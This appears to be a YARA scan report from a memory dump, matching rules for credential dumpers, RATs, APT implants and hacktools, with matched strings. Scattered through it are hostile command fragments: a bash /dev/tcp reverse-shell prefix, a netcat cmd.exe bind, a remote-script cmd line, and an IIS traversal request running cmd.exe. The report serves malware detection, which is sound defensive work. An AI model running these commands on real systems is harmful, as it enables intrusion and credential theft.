00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Persistence	Auto-generated rule - file Persistence.ps1	Florian Roth	0xd56fe:$s2: }=$PROFILE.AllUsersAllHosts;${ 0xd5793:$s4: = gwmi Win32_OperatingSystem \| select -ExpandProperty OSArchitecture 0xd57ec:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) 0xd5858:$s6: }=$PROFILE.CurrentUserAllHosts;${ 0xd588e:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xd6991:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xd58eb:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection	Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1	Florian Roth	0xd5bf6:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) 0xd5c81:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) 0xd5cf7:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) 0xd5d7a:$s4: Function Import-DllInRemoteProcess 0xd5dba:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA=='))) 0xd5e06:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) 0xd5e77:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) 0xd5edf:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) \| Out-Null 0xd5f5f:$s9: ::FromBase64String('RABvAG4AZQAhAA=='))) 0xd5fe8:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Inveigh_BruteForce_2	Auto-generated rule - from files Inveigh-BruteForce.ps1	Florian Roth	0xd62c8:$s1: }.NTLMv2_file_queue[0]\|Out-File ${ 0xd62ff:$s2: }.NTLMv2_file_queue.RemoveRange(0,1) 0xd6338:$s3: }.NTLMv2_file_queue.Count -gt 0) 0xd636d:$s4: }.relay_running = $false
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Persistence_2	Auto-generated rule - from files Persistence.ps1	Florian Roth	0xd588e:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xd6991:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=') 0xd69ee:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA') 0xd6a47:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==') 0xd6a98:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 0xd6af8:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 0xd6b5b:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 0xd6bc5:$s7: FromBase64String('TQBlAHQAaABvAGQA') 0xd6bfe:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=') 0xd6c3b:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ps1_toolkit_Inveigh_BruteForce_3	Auto-generated rule - from files Inveigh-BruteForce.ps1	Florian Roth	0xd6edf:$s1: ::FromBase64String('TgBUAEwATQA=') 0xd6f16:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA'))) 0xd6f63:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA='))) 0xd6fb4:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA=='))) 0xd7009:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)` 0xd7070:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA 0xd70c3:$s7: }.bruteforce_running)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Casper_Included_Strings	Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo	Florian Roth	0x17c7de:$a0: cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST 0x17c81b:$a1: & SYSTEMINFO) ELSE EXIT 0x17c86c:$c2: jpic.gov.sy 0x17c8b6:$c4: perfaudio.dat 0x17c8db:$c5: Casper_DLL.dll 0x17c942:$c7: {4216567A-4512-9825-7745F856}
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Casper_SystemInformation_Output	Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo	Florian Roth	0x17cba1:$a0: *** SYSTEM INFORMATION ** 0x17cbd0:$a1: * SECURITY INFORMATION ** 0x17cc01:$a2: Antivirus: 0x17cc1c:$a3: Firewall: 0x17cc36:$a4: * EXECUTION CONTEXT **** 0x17cc64:$a5: Identity: 0x17cc7e:$a6: <CONFIG TIMESTAMP=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Backdoor_Redosdru_Jun17	Detects malware Redosdru - file systemHome.exe	Florian Roth	0x767ae:$x3: baijinUPdate 0x76817:$s2: serviceone 0x7683f:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F# 0x768c3:$s4: servicetwo 0x768eb:$s5: UpdateCrc 0x76912:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F# 0x76986:$s7: nwsaPAgEnT 0x769ae:$s8: %-24s %-15s 0x%x(%d)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	IronGate_APT_Step7ProSim_Gen	Detects IronGate APT Malware - Step7ProSim DLL	Florian Roth	0xed106:$s1: Step7ProSim.Interfaces 0xed13a:$s2: payloadExecutionTimeInMilliSeconds 0xed1b6:$s4: <KillProcess>b__0 0xed1e5:$s5: newDllFilename 0xed241:$s7: $863d8af0-cee6-4676-96ad-13e8540f4d47 0xed284:$s8: RunPlcSim 0xed2ab:$s9: $ccc64bc5-ef95-4217-adc4-5bf0d448c272 0xed2ef:$s10: InstallProxy 0xed31a:$s11: DllProxyInstaller 0xed34a:$s12: FindFileInDrive
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x6b268:$x1: zxplug -add 0x6b302:$x4: -fromurl http://x.x.x/x.dll 0x6b33b:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s 0x6b384:$x6: ZXNC -e cmd.exe x.x.x.x 0x6b3b9:$x7: (bind a cmdshell) 0x6b3e8:$x8: ZXFtpServer 21 20 zx 0x6b41a:$x9: ZXHttpServer 0x6b4cd:$x12: AntiSniff -a wireshark.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	DeepPanda_lot1	Hack Deep Panda - lot1.tmp-pwdump	Florian Roth	0xd31fb:$s0: Unable to open target process: %d, pid %d 0x17e31e:$s0: Unable to open target process: %d, pid %d 0xd3dd8:$s1: Couldn't delete target executable from remote machine: %d 0x17e365:$s1: Couldn't delete target executable from remote machine: %d 0x17e3bc:$s2: Target: Failed to load SAM functions. 0x17e3ff:$s5: Error writing the test file %s, skipping this share 0x17e450:$s6: Failed to create service (%s/%s), error %d 0x17e498:$s8: Service start failed: %d (%s/%s) 0xd3b78:$s12: PwDump.exe 0x17e4d7:$s12: PwDump.exe 0x17e500:$s13: GetAvailableWriteableShare returned an error of %ld 0x17e581:$s15: Couldn't copy %s to destination %s. (Error %d) 0x17e5ce:$s16: dump logon session 0x17e5ff:$s17: Timed out waiting to get our pipe back 0x17e644:$s19: SetNamedPipeHandleState failed, error %d
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x1082c3:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x1301e7:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x17e87a:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x1083b0:$s3: [SERVER]connection to %s:%d error 0x131d0e:$s3: [SERVER]connection to %s:%d error 0x13dac2:$s3: [SERVER]connection to %s:%d error 0x1577bb:$s3: [SERVER]connection to %s:%d error 0x17e8f0:$s3: [SERVER]connection to %s:%d error 0x1577fa:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0x17e92f:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0x17e97f:$s8: ======================== htran V%s ======================= 0x157941:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0x17e9d8:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0x108571:$s15: [+] OK! I Closed The Two Socket. 0x13db01:$s15: [+] OK! I Closed The Two Socket. 0x17ea38:$s15: [+] OK! I Closed The Two Socket. 0x1579e2:$s20: -listen <ConnectPort> <TransmitPort> 0x17ea77:$s20: -listen <ConnectPort> <TransmitPort>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EternalRocks_taskhost	Detects EternalRocks Malware - file taskhost.exe	Florian Roth	0x79370:$s1: sTargetIP 0x79397:$s2: SERVER_2008R2_SP0 0x793c6:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51 0x7940c:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x12ec2f:$a: Amplia Security 0x1dcaa9:$a: Amplia Security 0x1dcc21:$a: Amplia Security 0x12ec17:$c: getlsasrvaddr.exe 0x1dcc3f:$c: getlsasrvaddr.exe 0x1dcc5f:$d: Cannot get PID of LSASS.EXE 0x1dcc89:$e: extract the TGT session key 0x1dccb3:$f: PPWDUMP_DATA
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PwDump	PwDump 6 variant	Marc Stroebel	0xd3cce:$s5: Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa 0xd3d3e:$s7: pwdump6 Version %s by fizzgig and the mighty group at foofus.net
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0x17e3c4:$c: Failed to load SAM functions
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0x1db4b8:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ncrack	This signature detects the Ncrack brute force tool	Florian Roth	0x1db6c0:$s1: NcrackOutputTable only supports adding up to 4096 to a cell via
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x1db8c0:$s1: except SqlmapBaseException, ex:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PortScanner	Auto-generated rule on file PortScanner.exe	yarGen Yara Rule Generator by Florian Roth	0x1dbaa5:$s0: Scan Ports Every 0x1dbac5:$s3: Scan All Possible Ports!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	NetBIOS_Name_Scanner	Auto-generated rule on file NetBIOS Name Scanner.exe	yarGen Yara Rule Generator by Florian Roth	0xee534:$s0: IconEx 0x1dbf0d:$s0: IconEx 0x37663:$s2: soft Visual Stu 0x3799e:$s2: soft Visual Stu 0x1dbcde:$s2: soft Visual Stu 0x1dbf23:$s2: soft Visual Stu 0x1dbf42:$s4: NBTScanner!y&
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	FeliksPack3___Scanners_ipscan	Auto-generated rule on file ipscan.exe	yarGen Yara Rule Generator by Florian Roth	0x1dc124:$s2: WCAP;}ECTED 0x130dcf:$s4: NotSupported 0x1dc13f:$s4: NotSupported 0x1dc15b:$s6: SCAN.VERSION{_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	IP_Stealing_Utilities	Auto-generated rule on file IP Stealing Utilities.exe	yarGen Yara Rule Generator by Florian Roth	0x1dc5b3:$s0: DarkKnight 0x1dc5cd:$s9: IPStealerUtilities
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x1dc7a3:$s0: Auto Scroll BOTH Text Boxes 0x1dc7ce:$s4: Start/Stop Portscanning 0x1dc7f5:$s6: Auto Save LogFile by pressing STOP
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x1dc9dd:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Powershell_Netcat	Detects a Powershell version of the Netcat network hacking tool	Florian Roth	0x18bfcb:$s0: [ValidateRange(1, 65535)] 0x18bffc:$s1: $Client = New-Object -TypeName System.Net.Sockets.TcpClient 0x18c04f:$s2: $Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Hacktools_CN_Burst_pass	Disclosed hacktool set - file pass.txt	Florian Roth	0x18a3e8:$s0: 123456.com 0x18a410:$s1: 123123.com 0x18a438:$s2: 360.com 0x18a45d:$s3: 123.com 0x18a482:$s4: juso.com 0x18a4a8:$s5: sina.com 0x18a4ce:$s7: changeme 0x2e38:$s8: master 0x1aae0:$s8: master 0x1ad9c:$s8: master 0x2b58b:$s8: master 0x3fd3f:$s8: master 0x57e53:$s8: master 0x5e674:$s8: master 0x107eff:$s8: master 0x12b5ab:$s8: master 0x136ff0:$s8: master 0x13708f:$s8: master 0x1370cc:$s8: master 0x143b3a:$s8: master 0x143b78:$s8: master
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Hacktools_CN_Burst_Start	Disclosed hacktool set - file Start.bat - DoS tool	Florian Roth	0x18b618:$s1: Blast.bat /r 600 0x18b646:$s2: Blast.bat /l Blast.bat 0x18b67a:$s3: Blast.bat /c 600 0x18aea5:$s4: start Clear.bat 0x18b6a8:$s4: start Clear.bat 0x1641e8:$s5: del Result.txt 0x18ac88:$s5: del Result.txt 0x18b6d5:$s5: del Result.txt 0x18b701:$s6: s syn %%i %%j 3306 /save 0x18b737:$s7: start Thecard.bat 0x18b767:$s10: setlocal enabledelayedexpansion
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Hacktools_CN_Burst_Blast	Disclosed hacktool set - file Blast.bat	Florian Roth	0x189f6a:$s0: @sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http: 0x189fb1:$s1: @echo off 0x18a191:$s1: @echo off
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EditKeyLogReadMe	Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt	Florian Roth	0x189935:$s0: editKeyLog.exe KeyLog.exe, 0x18996d:$s1: WinEggDrop.DLL 0x189999:$s2: nc.exe 0x189944:$s3: KeyLog.exe 0x1899bd:$s3: KeyLog.exe 0x1899e5:$s4: EditKeyLog.exe 0x189a11:$s5: wineggdrop
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PassSniffer_zip_Folder_readme	Disclosed hacktool set (old stuff) - file readme.txt	Florian Roth	0x188e87:$s0: PassSniffer.exe 0x188eb4:$s1: POP3/FTP Sniffer 0x188ee2:$s2: Password Sniffer V1.0
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Jc_WinEggDrop_Shell	Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt	Florian Roth	0x1895a4:$s0: Sniffer.dll 0x1895cd:$s4: :Execute net.exe user Administrator pass 0x189613:$s5: Fport.exe or mport.exe 0x189648:$s6: :Password Sniffering Is Running \|Not Running 0x189693:$s9: : The Terminal Service Port Has Been Set To NewPort 0x1896e5:$s15: : Del www.exe 0x189724:$s20: :Dir *.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	LinuxHacktool_eyes_a	Linux hack tools - file a	Florian Roth	0x17f6c3:$s1: mv scan.log bios.txt 0x17f6f5:$s2: rm -rf bios.txt 0x17f756:$s4: ././pscan2 $1 22
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CN_Toolset_sig_1433_135_sqlr	Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe	Florian Roth	0x178d34:$s0: Connect to %s MSSQL server success. Type Command at Prompt. 0x178d8e:$s11: ;DATABASE=master 0x145347:$s12: xp_cmdshell ' 0x178dbd:$s12: xp_cmdshell ' 0x178de9:$s14: SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	VSSown_VBS	Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere	Florian Roth	0x105a36:$s0: Select * from Win32_Service Where Name ='VSS' 0x105a78:$s1: Select * From Win32_ShadowCopy 0x105aab:$s2: cmd /C mklink /D 0x105ad1:$s3: ClientAccessible 0x326b:$s4: WScript.Shell 0x1e7ea:$s4: WScript.Shell 0x3a48a:$s4: WScript.Shell 0x46812:$s4: WScript.Shell 0x46884:$s4: WScript.Shell 0x477ba:$s4: WScript.Shell 0x5382f:$s4: WScript.Shell 0x5bc69:$s4: WScript.Shell 0x5bcc3:$s4: WScript.Shell 0x6014b:$s4: WScript.Shell 0x601a1:$s4: WScript.Shell 0x6037d:$s4: WScript.Shell 0x67f0e:$s4: WScript.Shell 0x698b4:$s4: WScript.Shell 0x72f72:$s4: WScript.Shell 0x7a422:$s4: WScript.Shell 0x7a6d9:$s4: WScript.Shell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Linux_Portscan_Shark_2	Detects Linux Port Scanner Shark	Florian Roth	0xf3887:$s1: usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port> 0xf3910:$s2: Difference between server modulus and host modulus is only %d. It's illegal and may not work 0xf358e:$s3: rm -rf scan.log 0xf398a:$s3: rm -rf scan.log
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WCE_in_memory	Detects Windows Credential Editor (WCE) in memory (and also on disk)	Florian Roth	0xd8ca1:$s1: wkKUSvflehHr::o:t:s:c:i:d:a:g: 0xd8cdd:$s2: wceaux.dll
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	pstgdump	Detects a tool used by APT groups - file pstgdump.exe	Florian Roth	0xd2a63:$x2: Failed to dump all protected storage items - see previous messages for details 0xd2acf:$x3: ptsgdump [-h][-q][-u Username][-p Password] 0xd2b18:$x4: Attempting to impersonate domain user '%s' in domain '%s' 0xd2b6f:$x5: Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d 0xd2bd2:$x6: Unable to obtain handle to PStoreCreateInstance in pstorec.dll
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	lsremora	Detects a tool used by APT groups	Florian Roth	0xd2e41:$x1: Target: Failed to load primary SAM functions. 0xd32a3:$x2: lsremora64.dll 0xd3e2f:$x2: lsremora64.dll 0xd3e5b:$x5: lsremora.dll 0xd2fa5:$s3: Using pipe %s
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	cachedump	Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe	Florian Roth	0xd3949:$s2: Unable to open LSASS.EXE process 0xd3987:$s3: Service not found. Installing CacheDump Service (%s) 0xd39d9:$s4: CacheDump service successfully installed. 0xd3a20:$s5: Kill CacheDump service (shouldn't be used) 0xd3a68:$s6: cacheDump [-v \| -vv \| -K]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PwDump_B	Detects a tool used by APT groups - file PwDump.exe	Florian Roth	0xd3cce:$x1: Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName 0xd3d3e:$x2: pwdump6 Version %s by fizzgig and the mighty group at foofus.net 0xd3d9c:$x3: where -x targets a 64-bit host 0xd3dd8:$x4: Couldn't delete target executable from remote machine: %d 0x17e365:$x4: Couldn't delete target executable from remote machine: %d 0xd32a3:$s1: lsremora64.dll 0xd3e2f:$s1: lsremora64.dll 0xd3e5b:$s2: lsremora.dll 0xd3e85:$s3: servpw.exe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	MSBuild_Mimikatz_Execution_via_XML	Detects an XML that executes Mimikatz on an endpoint via MSBuild	Florian Roth	0xcfb0d:$x1: <Project ToolsVersion= 0xcfb38:$x2: </SharpLauncher> 0x41a27:$s1: "TVqQAAMAAAA 0x4757c:$s1: "TVqQAAMAAAA 0x536a9:$s1: "TVqQAAMAAAA 0x68166:$s1: "TVqQAAMAAAA 0xcfb67:$s1: "TVqQAAMAAAA 0xd895e:$s1: "TVqQAAMAAAA 0x10beb4:$s1: "TVqQAAMAAAA 0x10c656:$s1: "TVqQAAMAAAA 0xcfb88:$s2: System.Convert.FromBase64String( 0xe0f6:$s3: .Invoke( 0x2db0d:$s3: .Invoke( 0x2db6d:$s3: .Invoke( 0x2dcba:$s3: .Invoke( 0xb47c4:$s3: .Invoke( 0xc68c2:$s3: .Invoke( 0xc80db:$s3: .Invoke( 0xcfbbd:$s3: .Invoke( 0x10bbc4:$s3: .Invoke( 0xcfbda:$s4: Assembly.Load(
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Disclosed_0day_POCs_injector	Detects POC code from disclosed 0day hacktool set	Florian Roth	0x6d2bc:$x2: Cannot write the shellcode in the process memory, error: 0x6d313:$x3: /s shellcode_file PID: shellcode injection. 0x6d35c:$x4: /d dll_file PID: dll injection via LoadLibrary(). 0x6d313:$x5: /s shellcode_file PID 0x6d3ab:$x5: /s shellcode_file PID 0x6d3de:$x6: Shellcode copied in memory: OK 0x6d41a:$x7: Usage of the injector. 0x6d44f:$x8: KO: cannot obtain the SeDebug privilege.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0x2b6ba:$x1: Error injecting remote thread in process: 0x2b701:$s5: [-] Error getting access to process: %ld! 0x2b748:$s6: --process-name <name> Process name to inject 0x2b794:$s12: No injection target has been provided! 0x2b7d9:$s17: [-] An app path is required when not injecting!
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0x2f284:$s1: Crypto.Hash 0x2f2ad:$s2: laZagne 0x2f2d2:$s3: impacket.winregistry
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0x24dcb:$: /bin/bash -i >& /dev/tcp/
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_Lazagne_Gen_18	Detects Lazagne password extractor hacktool	Florian Roth	0xec93:$x1: lazagne.config.powershell_execute( 0xecd3:$x2: creddump7.win32. 0xecf8:$x3: lazagne.softwares.windows.hashdump 0xed2f:$x4: .softwares.memory.libkeepass.common(
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_NoPowerShell	Detects NoPowerShell hack tool	Florian Roth	0xd9da:$x1: \NoPowerShell.pdb
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_LNX_Pnscan	Detects Pnscan port scanner	Florian Roth	0x50bd:$x1: -R<hex list> Hex coded response string to look for. 0x5110:$x2: This program implements a multithreaded TCP port scanner.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x5f474:$x1: reflective_inject_dll 0x5f559:$x1: reflective_inject_dll 0x5f58c:$x1: reflective_inject_dll 0xb07a3:$x1: reflective_inject_dll 0xb07d6:$x2: ImportError: pupy builtin module not found ! 0xb0820:$x3: please start pupy from either it's exe stub or it's reflective DLLR; 0x5f513:$x4: [INJECT] inject_dll. 0xb0882:$x4: [INJECT] inject_dll. 0xb08b4:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Suspicious_Script_Running_from_HTTP	Detects a suspicious	Florian Roth	0x5dc20:$s1: cmd /C script:http:// 0x5dc51:$s2: cmd /C script:https:// 0x5dc83:$s3: cmd.exe /C script:http:// 0x5dcb8:$s4: cmd.exe /C script:https://
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	SUSP_Netsh_PortProxy_Command	Detects a suspicious command line with netsh and the portproxy command	Florian Roth	0x6915:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_1	Detetcs the Nanocore RAT and similar malware	Florian Roth	0xf1e48:$x2: RunPE1 0xf1e6c:$x3: 082B8C7D3F9105DC66A7E3267C9750CF43E9D325 0xf1eb2:$x4: $374e0775-e893-4e72-806c-a8d880a49ae7 0xf1ef5:$x5: Monitorinjection
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x36f4e:$x1: NanoCore.ClientPluginHost 0xf216d:$x1: NanoCore.ClientPluginHost 0xf21a4:$x2: IClientNetworkHost 0xf21d4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0x2143a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x2c39a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x214b9:$s1: release mutex - %u (%u)(%u) 0x21523:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x21572:$s4: MakeFile Error(%d) copy file to temp file %s 0x215bc:$s5: %s%%s08x.tmp 0x215e6:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x21641:$s7: Mutex_Log 0x216e6:$s10: Error: pos(%d) > CmdSize(%d) 0x214fd:$s11: \win.com 0x21722:$s11: \win.com 0x2c673:$s11: \win.com 0x21749:$s12: Error(%d) run %s 0x21779:$s13: %02d.%02d.%04d Log begin: 0x2c631:$s13: %02d.%02d.%04d Log begin:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT_Malware_CommentCrew_MiniASP	CommentCrew Malware MiniASP APT	Florian Roth	0x168fd1:$x2: run http://%s/logo.png setup.exe 0x5442d:$z1: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 0x16903c:$z1: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 0x1690a1:$z2: Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit) 0x1690ef:$z3: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC 0x169154:$s1: http://%s/device_command.asp?device_id=%s&cv=%s&command=%s 0x1691ac:$s2: kill process error! 0x1691dd:$s3: kill process success! 0x169210:$s4: pickup command error! 0x169243:$s5: http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s 0xa01c9:$s6: no command 0x1692a5:$s6: no command 0x16931c:$s8: command is null! 0x16934a:$s9: pickup command Ok! 0x16937b:$s10: http://%s/result_%s.htm
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	IMPLANT_3_v1	X-Agent/CHOPSTICK Implant by APT28	US CERT	0x141ce9:$STR1: >process isn't exist<
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Industroyer_Portscan_3_Output	Detects Industroyer related custom port scaner output file	Florian Roth	0x7465b:$s1: WSA library load complite. 0x74693:$s2: Connection refused
